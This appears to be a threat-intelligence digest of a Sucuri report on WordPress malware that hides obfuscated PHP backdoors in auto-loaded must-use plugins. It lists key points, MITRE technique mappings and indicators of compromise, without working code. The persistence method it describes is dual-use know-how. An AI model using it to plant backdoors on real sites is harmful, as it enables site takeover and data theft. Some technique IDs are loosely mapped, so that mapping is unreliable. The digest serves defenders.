This article discusses a real-life incident in which malware was found deeply embedded in a WordPress website, utilizing backdoors in must-use plugins to execute malicious code remotely. The malware exploits obfuscation and persistent methods to avoid detection, posing severe risks to website security and data integrity. Affected: WordPress websites
Keypoints :
- Malware was found hidden in a WordPress website using files in the mu-plugins directory.
- Must-use plugins are auto-loaded and evade standard deactivation methods.
- Obfuscated PHP code was used to maintain malicious payloads and execute arbitrary code remotely.
- Malware can lead to complete control over the server, potentially causing data theft and reputation damage.
- Attackers employed multiple backdoors to ensure persistence in their control over the compromised site.
- Regular scanning and website hardening are crucial for protection against malware and backdoors.
MITRE Techniques :
- Tactic: Exfiltration (ID T1041) – Procedure: Attackers are remotely executing malicious code that can exfiltrate data from the infected server.
- Tactic: Execution (ID T1203) – Procedure: Executing arbitrary code via evaluated payloads fetched from external sources.
- Tactic: Command and Control (ID T1071) – Procedure: Utilizing external HTTP requests to maintain control over the compromised site.
- Tactic: Persistence (ID T1053) – Procedure: Installing additional backdoors to ensure long-term access to the server.
Indicator of Compromise :
- [File] /wp-content/mu-plugins/index.php
- [File] /wp-content/mu-plugins/test-mu-plugin.php
- [Directory] /wp-content/uploads/2024/12/
- [URL] http://malicious[. ]com/path (example of a generic malicious URL structure)
- [Base64-Encoded PHP] ZmlsZV9nZXRfY29udGVudHM=
Full Story: https://blog.sucuri.net/2025/02/hidden-backdoors-uncovered-in-wordpress-malware-investigation.html